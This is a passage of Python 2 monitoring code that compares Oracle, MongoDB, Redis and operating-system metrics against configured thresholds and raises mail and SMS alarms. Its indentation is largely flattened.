send_mail = func.update_send_mail_status(server_id,db_type,'processes',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes',processes,'critical','too many processes',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',3,host,port,create_time,'processes',processes,'critical')
elif int(processes)>=int(threshold_warning_processes):
send_mail = func.update_send_mail_status(server_id,db_type,'processes',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes',processes,'warning','too many processes',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',2,host,port,create_time,'processes',processes,'warning')
else:
func.update_db_status('sessions',1,host,port,create_time,'processes',processes,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'processes',processes,'processes ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
if int(alarm_processes_running)==1:
if int(processes_running)>=int(threshold_critical_processes_running):
send_mail = func.update_send_mail_status(server_id,db_type,'processes_running',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes_running',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes_running',processes_running,'critical','too many processes running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',3,host,port,create_time,'processes_running',processes_running,'critical')
elif int(processes_running)>=int(threshold_warning_processes_running):
send_mail = func.update_send_mail_status(server_id,db_type,'processes_running',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes_running',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes_running',processes_running,'warning','too many processes running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',2,host,port,create_time,'processes_running',processes_running,'warning')
else:
func.update_db_status('actives',1,host,port,create_time,'processes_running',processes_running,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'processes_running',processes_running,'processes running ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
if int(alarm_processes_waits)==1:
if int(processes_waits)>=int(threshold_critical_processes_waits):
send_mail = func.update_send_mail_status(server_id,db_type,'processes_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes_waits',processes_waits,'critical','too many processes waits',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',3,host,port,create_time,'processes_waits',processes_waits,'critical')
elif int(processes_waits)>=int(threshold_warning_processes_waits):
send_mail = func.update_send_mail_status(server_id,db_type,'processes_waits',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'processes_waits',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'processes_waits',processes_waits,'warning','too many processes waits',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',2,host,port,create_time,'processes_waits',processes_waits,'warning')
else:
func.update_db_status('waits',1,host,port,create_time,'processes_waits',processes_waits,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'processes_waits',processes_waits,'processes waits ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
else:
pass
def get_alarm_oracle_tablespace():
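    # Oracle tablespaces: alarm when the highest usage ratio (max_rate)
    # crosses the configured warning/critical thresholds.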
sql = """SELECT a.server_id,
a.tablespace_name,
a.total_size,
a.used_size,
CONVERT(a.max_rate, DECIMAL(6,2)) as max_rate,
a.create_time,
               b.HOST,
               b.PORT,
b.alarm_tablespace,
b.threshold_warning_tablespace,
b.threshold_critical_tablespace,
b.send_mail,
b.send_mail_to_list,
b.send_sms,
b.send_sms_to_list,
b.tags,
'oracle' AS db_type
FROM oracle_tablespace a, db_cfg_oracle b
WHERE a.server_id = b.id
ORDER BY max_rate desc """
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
tablespace_name=line[1]
total_size=line[2]
used_size=line[3]
max_rate=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_tablespace=line[8]
threshold_warning_tablespace=line[9]
threshold_critical_tablespace=line[10]
send_mail=line[11]
send_mail_to_list=line[12]
send_sms=line[13]
send_sms_to_list=line[14]
tags=line[15]
db_type=line[16]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if int(alarm_tablespace)==1:
if int(max_rate) >= int(threshold_critical_tablespace):
send_mail = func.update_send_mail_status(server_id,db_type,'tablespace(%s)' %(tablespace_name),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'tablespace(%s)' %(tablespace_name),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'tablespace(%s)' %(tablespace_name),max_rate,'critical','tablespace %s usage reach %s' %(tablespace_name,max_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('tablespace',3,host,port,create_time,'tablespace(%s)' %(tablespace_name),max_rate,'critical')
elif int(max_rate) >= int(threshold_warning_tablespace):
send_mail = func.update_send_mail_status(server_id,db_type,'tablespace(%s)' %(tablespace_name),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'tablespace(%s)' %(tablespace_name),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'tablespace(%s)' %(tablespace_name),max_rate,'warning','tablespace %s usage reach %s' %(tablespace_name,max_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('tablespace',2,host,port,create_time,'tablespace(%s)' %(tablespace_name),max_rate,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'tablespace(%s)' %(tablespace_name),max_rate,'tablespace %s usage ok' %(tablespace_name),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('tablespace',1,host,port,create_time,'tablespace','max(%s:%s)' %(tablespace_name,max_rate),'ok')
else:
pass
def get_alarm_oracle_diskgroup():
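    # Oracle ASM diskgroups: the query pre-filters rows below the warning
    # threshold, so only alarm candidates reach the loop below.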
sql = """SELECT a.server_id,
a.diskgroup_name,
a.total_mb,
a.free_mb,
CONVERT(a.used_rate, DECIMAL(5,2)) as used_rate,
a.create_time,
b.HOST,
b.PORT,
b.alarm_asm_space,
b.threshold_warning_asm_space,
b.threshold_critical_asm_space,
b.send_mail,
b.send_mail_to_list,
b.send_sms,
b.send_sms_to_list,
b.tags,
'oracle' AS db_type
FROM oracle_diskgroup a, db_cfg_oracle b
WHERE a.server_id = b.id
and CONVERT(a.used_rate, DECIMAL(5,2)) >= b.threshold_warning_asm_space
ORDER BY used_rate desc """
result=func.mysql_query(sql)
if result <> 0:
for line in result:
#print "diskgroup_name: %s" %(line[1])
server_id=line[0]
diskgroup_name=line[1]
total_mb=line[2]
free_mb=line[3]
used_rate=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_asm_space=line[8]
threshold_warning_asm_space=line[9]
threshold_critical_asm_space=line[10]
send_mail=line[11]
send_mail_to_list=line[12]
send_sms=line[13]
send_sms_to_list=line[14]
tags=line[15]
db_type=line[16]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if int(alarm_asm_space)==1:
if int(used_rate) >= int(threshold_critical_asm_space):
send_mail = func.update_send_mail_status(server_id,db_type,'diskgroup(%s)' %(diskgroup_name),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'diskgroup(%s)' %(diskgroup_name),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'diskgroup(%s)' %(diskgroup_name),used_rate,'critical','diskgroup %s usage reach %s' %(diskgroup_name,used_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('diskgroup',3,host,port,create_time,'diskgroup(%s)' %(diskgroup_name),used_rate,'critical')
elif int(used_rate) >= int(threshold_warning_asm_space):
send_mail = func.update_send_mail_status(server_id,db_type,'diskgroup(%s)' %(diskgroup_name),send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'diskgroup(%s)' %(diskgroup_name),send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'diskgroup(%s)' %(diskgroup_name),used_rate,'warning','diskgroup %s usage reach %s' %(diskgroup_name,used_rate),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('diskgroup',2,host,port,create_time,'diskgroup(%s)' %(diskgroup_name),used_rate,'warning')
else:
                    func.check_if_ok(server_id,tags,host,port,create_time,db_type,'diskgroup(%s)' %(diskgroup_name),used_rate,'diskgroup %s usage ok' %(diskgroup_name),send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('diskgroup',1,host,port,create_time,'diskgroup','max(%s:%s)' %(diskgroup_name,used_rate),'ok')
else:
pass
def get_alarm_mongodb_status():
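    # MongoDB: availability plus current connections, active clients and the
    # global-lock current queue length.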
sql = "select a.server_id,a.connect,a.connections_current,a.globalLock_activeClients,a.globalLock_currentQueue,a.create_time,b.host,b.port,b.alarm_connections_current,b.alarm_active_clients,b.alarm_current_queue,b.threshold_warning_connections_current,b.threshold_critical_connections_current,b.threshold_warning_active_clients,b.threshold_critical_active_clients,b.threshold_warning_current_queue,b.threshold_critical_current_queue,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'mongodb' as db_type from mongodb_status a, db_cfg_mongodb b where a.server_id=b.id;"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
connect=line[1]
connections_current=line[2]
globalLock_activeClients=line[3]
globalLock_currentQueue=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_connections_current=line[8]
alarm_active_clients=line[9]
alarm_current_queue=line[10]
threshold_warning_connections_current=line[11]
threshold_critical_connections_current=line[12]
threshold_warning_active_clients=line[13]
threshold_critical_active_clients=line[14]
threshold_warning_current_queue=line[15]
threshold_critical_current_queue=line[16]
send_mail=line[17]
send_mail_to_list=line[18]
send_sms=line[19]
send_sms_to_list=line[20]
tags=line[21]
db_type=line[22]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if connect <> 1:
send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','mongodb server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
func.update_db_status('sessions','-1',host,port,'','','','')
func.update_db_status('actives','-1',host,port,'','','','')
func.update_db_status('waits','-1',host,port,'','','','')
func.update_db_status('repl','-1',host,port,'','','','')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','mongodb server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
if int(alarm_connections_current)==1:
if int(connections_current) >= int(threshold_critical_connections_current):
send_mail = func.update_send_mail_status(server_id,db_type,'connections_current',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connections_current',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connections_current',connections_current,'critical','too many connections current',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',3,host,port,create_time,'connections_current',connections_current,'critical')
elif int(connections_current) >= int(threshold_warning_connections_current):
send_mail = func.update_send_mail_status(server_id,db_type,'connections_current',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connections_current',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connections_current',connections_current,'warning','too many connections current',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',2,host,port,create_time,'connections_current',connections_current,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connections_current',connections_current,'connections current ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',1,host,port,create_time,'connections_current',connections_current,'ok')
if int(alarm_active_clients)==1:
if int(globalLock_activeClients) >= int(threshold_critical_active_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'active_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'active_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'active_clients',globalLock_activeClients,'critical','too many active clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',3,host,port,create_time,'active_clients',globalLock_activeClients,'critical')
elif int(globalLock_activeClients) >= int(threshold_warning_active_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'active_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'active_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'active_clients',globalLock_activeClients,'warning','too many active clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',2,host,port,create_time,'active_clients',globalLock_activeClients,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'active_clients',globalLock_activeClients,'active clients ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',1,host,port,create_time,'active_clients',globalLock_activeClients,'ok')
if int(alarm_current_queue)==1:
if int(globalLock_currentQueue) >= int(threshold_critical_current_queue):
send_mail = func.update_send_mail_status(server_id,db_type,'current_queue',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'current_queue',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'current_queue',globalLock_currentQueue,'critical','too many current queue',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',3,host,port,create_time,'current_queue',globalLock_currentQueue,'critical')
elif int(globalLock_currentQueue) >= int(threshold_warning_current_queue):
send_mail = func.update_send_mail_status(server_id,db_type,'current_queue',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'current_queue',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'current_queue',globalLock_currentQueue,'warning','too many current queue',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',2,host,port,create_time,'current_queue',globalLock_currentQueue,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'current_queue',globalLock_currentQueue,'current queue ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',1,host,port,create_time,'current_queue',globalLock_currentQueue,'ok')
else:
pass
def get_alarm_redis_status():
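    # Redis: availability plus connected clients, the sampled
    # commands-processed counter and blocked clients.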
sql = "select a.server_id,a.connect,a.connected_clients,a.current_commands_processed,a.blocked_clients,a.create_time,b.host,b.port,b.alarm_connected_clients,b.alarm_command_processed,b.alarm_blocked_clients,b.threshold_warning_connected_clients,b.threshold_critical_connected_clients,b.threshold_warning_command_processed,b.threshold_critical_command_processed,b.threshold_warning_blocked_clients,b.threshold_critical_blocked_clients,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list,b.tags,'redis' as db_type from redis_status a, db_cfg_redis b where a.server_id=b.id ;"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
server_id=line[0]
connect=line[1]
connected_clients=line[2]
current_commands_processed=line[3]
blocked_clients=line[4]
create_time=line[5]
host=line[6]
port=line[7]
alarm_connected_clients=line[8]
alarm_command_processed=line[9]
alarm_blocked_clients=line[10]
threshold_warning_connected_clients=line[11]
threshold_critical_connected_clients=line[12]
threshold_warning_command_processed=line[13]
threshold_critical_command_processed=line[14]
threshold_warning_blocked_clients=line[15]
threshold_critical_blocked_clients=line[16]
send_mail=line[17]
send_mail_to_list=line[18]
send_sms=line[19]
send_sms_to_list=line[20]
tags=line[21]
db_type=line[22]
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if connect <> 1:
send_mail = func.update_send_mail_status(server_id,db_type,'connect',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connect',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connect','down','critical','redis server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','3',host,port,create_time,'connect','down','critical')
func.update_db_status('sessions','-1',host,port,'','','','')
func.update_db_status('actives','-1',host,port,'','','','')
func.update_db_status('waits','-1',host,port,'','','','')
func.update_db_status('repl','-1',host,port,'','','','')
func.update_db_status('repl_delay','-1',host,port,'','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connect','up','redis server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('connect','1',host,port,create_time,'connect','up','ok')
if int(alarm_connected_clients)==1:
if int(connected_clients) >= int(threshold_critical_connected_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'connected_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connected_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connected_clients',connected_clients,'critical','too many connected clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',3,host,port,create_time,'connected_clients',connected_clients,'critical')
elif int(connected_clients) >= int(threshold_warning_connected_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'connected_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'connected_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'connected_clients',connected_clients,'warning','too many connected clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',2,host,port,create_time,'connected_clients',connected_clients,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'connected_clients',connected_clients,'connected clients ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('sessions',1,host,port,create_time,'connected_clients',connected_clients,'ok')
if int(alarm_command_processed)==1:
if int(current_commands_processed) >= int(threshold_critical_command_processed):
send_mail = func.update_send_mail_status(server_id,db_type,'command_processed',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'command_processed',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'command_processed',current_commands_processed,'critical','too many command processed',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',3,host,port,create_time,'command_processed',current_commands_processed,'critical')
elif int(current_commands_processed) >= int(threshold_warning_command_processed):
send_mail = func.update_send_mail_status(server_id,db_type,'command_processed',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'command_processed',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'command_processed',current_commands_processed,'warning','too many command processed',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',2,host,port,create_time,'command_processed',current_commands_processed,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'command_processed',current_commands_processed,'command processed ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('actives',1,host,port,create_time,'command_processed',current_commands_processed,'ok')
if int(alarm_blocked_clients)==1:
if int(blocked_clients) >= int(threshold_critical_blocked_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'blocked_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'blocked_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'blocked_clients',blocked_clients,'critical','too many blocked clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',3,host,port,create_time,'blocked_clients',blocked_clients,'critical')
elif int(blocked_clients) >= int(threshold_warning_blocked_clients):
send_mail = func.update_send_mail_status(server_id,db_type,'blocked_clients',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(server_id,db_type,'blocked_clients',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'blocked_clients',blocked_clients,'warning','too many blocked clients',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',2,host,port,create_time,'blocked_clients',blocked_clients,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'blocked_clients',blocked_clients,'blocked clients ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('waits',1,host,port,create_time,'blocked_clients',blocked_clients,'ok')
else:
pass
def get_alarm_os_status():
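    # OS via SNMP: process count, 1-minute load, CPU idle (busy-percent
    # thresholds are converted to idle below) and memory usage.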
sql = "select a.ip,a.hostname,a.snmp,a.process,a.load_1,a.cpu_idle_time,a.mem_usage_rate,a.create_time,b.tags,b.alarm_os_process,b.alarm_os_load,b.alarm_os_cpu,b.alarm_os_memory,b.threshold_warning_os_process,b.threshold_critical_os_process,b.threshold_warning_os_load,b.threshold_critical_os_load,b.threshold_warning_os_cpu,b.threshold_critical_os_cpu,b.threshold_warning_os_memory,b.threshold_critical_os_memory,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list from os_status a,db_cfg_os b where a.ip=b.host"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
host=line[0]
hostname=line[1]
snmp=line[2]
process=line[3]
load_1=line[4]
cpu_idle=line[5]
memory_usage=line[6]
create_time=line[7]
tags=line[8]
alarm_os_process=line[9]
alarm_os_load=line[10]
alarm_os_cpu=line[11]
alarm_os_memory=line[12]
threshold_warning_os_process=line[13]
threshold_critical_os_process=line[14]
threshold_warning_os_load=line[15]
threshold_critical_os_load=line[16]
threshold_warning_os_cpu=line[17]
threshold_critical_os_cpu=line[18]
threshold_warning_os_memory=line[19]
threshold_critical_os_memory=line[20]
send_mail=line[21]
send_mail_to_list=line[22]
send_sms=line[23]
send_sms_to_list=line[24]
server_id=0
db_type="os"
port=''
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if snmp <> 1:
send_mail = func.update_send_mail_status(host,db_type,'snmp_server',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'snmp_server',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'snmp_server','down','critical','snmp server down',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('snmp','3',host,'',create_time,'snmp_server','down','critical')
func.update_db_status('process','-1',host,'','','','','')
func.update_db_status('load_1','-1',host,'','','','','')
func.update_db_status('cpu','-1',host,'','','','','')
func.update_db_status('memory','-1',host,'','','','','')
func.update_db_status('network','-1',host,'','','','','')
func.update_db_status('disk','-1',host,'','','','','')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'snmp_server','up','snmp server up',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('snmp',1,host,'',create_time,'snmp_server','up','ok')
if int(alarm_os_process)==1:
if int(process) >= int(threshold_critical_os_process):
send_mail = func.update_send_mail_status(host,db_type,'process',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'process',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'process',process,'critical','too many processes running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('process',3,host,'',create_time,'process',process,'critical')
elif int(process) >= int(threshold_warning_os_process):
send_mail = func.update_send_mail_status(host,db_type,'process',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'process',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'process',process,'warning','too many processes running',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('process',2,host,'',create_time,'process',process,'warning')
else:
func.update_db_status('process',1,host,'',create_time,'process',process,'ok')
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'process',process,'process running ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
if int(alarm_os_load)==1:
if int(load_1) >= int(threshold_critical_os_load):
send_mail = func.update_send_mail_status(host,db_type,'load',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'load',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'load',load_1,'critical','too high load',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('load_1',3,host,'',create_time,'load',load_1,'critical')
elif int(load_1) >= int(threshold_warning_os_load):
                        send_mail = func.update_send_mail_status(host,db_type,'load',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'load',send_sms,send_sms_max_count)
func.add_alarm(server_id,tags,host,port,create_time,db_type,'load',load_1,'warning','too high load',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('load_1',2,host,'',create_time,'load',load_1,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'load',load_1,'load ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('load_1',1,host,'',create_time,'load',load_1,'ok')
if int(alarm_os_cpu)==1:
threshold_critical_os_cpu = int(100-threshold_critical_os_cpu)
threshold_warning_os_cpu = int(100-threshold_warning_os_cpu)
if int(cpu_idle) <= int(threshold_critical_os_cpu):
send_mail = func.update_send_mail_status(host,db_type,'cpu_idle',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'cpu_idle',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'cpu_idle',str(cpu_idle)+'%','critical','cpu idle too low',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('cpu',3,host,'',create_time,'cpu_idle',str(cpu_idle)+'%','critical')
elif int(cpu_idle) <= int(threshold_warning_os_cpu):
send_mail = func.update_send_mail_status(host,db_type,'cpu_idle',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'cpu_idle',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'cpu_idle',str(cpu_idle)+'%','warning','cpu idle too low',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('cpu',2,host,'',create_time,'cpu_idle',str(cpu_idle)+'%','warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'cpu_idle',str(cpu_idle)+'%','cpu idle ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('cpu',1,host,'',create_time,'cpu_idle',str(cpu_idle)+'%','ok')
if int(alarm_os_memory)==1:
if memory_usage:
memory_usage_int = int(memory_usage.split('%')[0])
else:
memory_usage_int = 0
if int(memory_usage_int) >= int(threshold_critical_os_memory):
send_mail = func.update_send_mail_status(host,db_type,'memory',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'memory',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'memory',memory_usage,'critical','memory usage too high',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('memory',3,host,'',create_time,'memory',memory_usage,'critical')
elif int(memory_usage_int) >= int(threshold_warning_os_memory):
send_mail = func.update_send_mail_status(host,db_type,'memory',send_mail,send_mail_max_count)
send_sms = func.update_send_sms_status(host,db_type,'memory',send_sms,send_sms_max_count)
                        func.add_alarm(server_id,tags,host,port,create_time,db_type,'memory',memory_usage,'warning','memory usage too high',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('memory',2,host,'',create_time,'memory',memory_usage,'warning')
else:
func.check_if_ok(server_id,tags,host,port,create_time,db_type,'memory',memory_usage,'memory usage ok',send_mail,send_mail_to_list,send_sms,send_sms_to_list)
func.update_db_status('memory',1,host,'',create_time,'memory',memory_usage,'ok')
else:
pass
def get_alarm_os_disk():
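    # OS disk usage per mount point; used_rate arrives as a string such as
    # '85%' and is parsed to an integer before comparison.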
sql="select a.ip,a.mounted,a.used_rate,a.create_time,b.tags,b.alarm_os_disk,b.threshold_warning_os_disk,b.threshold_critical_os_disk,b.send_mail,b.send_mail_to_list,b.send_sms,b.send_sms_to_list from os_disk a,db_cfg_os b where a.ip=b.host group by ip,mounted order by SUBSTRING_INDEX(used_rate,'%',1)+0 asc;"
result=func.mysql_query(sql)
if result <> 0:
for line in result:
host=line[0]
mounted=line[1]
used_rate=line[2]
create_time=line[3]
tags=line[4]
alarm_os_disk=line[5]
threshold_warning_os_disk=line[6]
threshold_critical_os_disk=line[7]
send_mail=line[8]
send_mail_to_list=line[9]
send_sms=line[10]
send_sms_to_list=line[11]
server_id=0
db_type="os"
port=''
used_rate_arr=used_rate.split("%")
used_rate_int=int(used_rate_arr[0])
if send_mail_to_list is None or send_mail_to_list.strip()=='':
send_mail_to_list = mail_to_list_common
if send_sms_to_list is None or send_sms_to_list.strip()=='':
send_sms_to_list = sms_to_list_common
if int(alarm_os_disk)==1:
if int(used_rate_int) >= int(threshold_critical_os_disk):
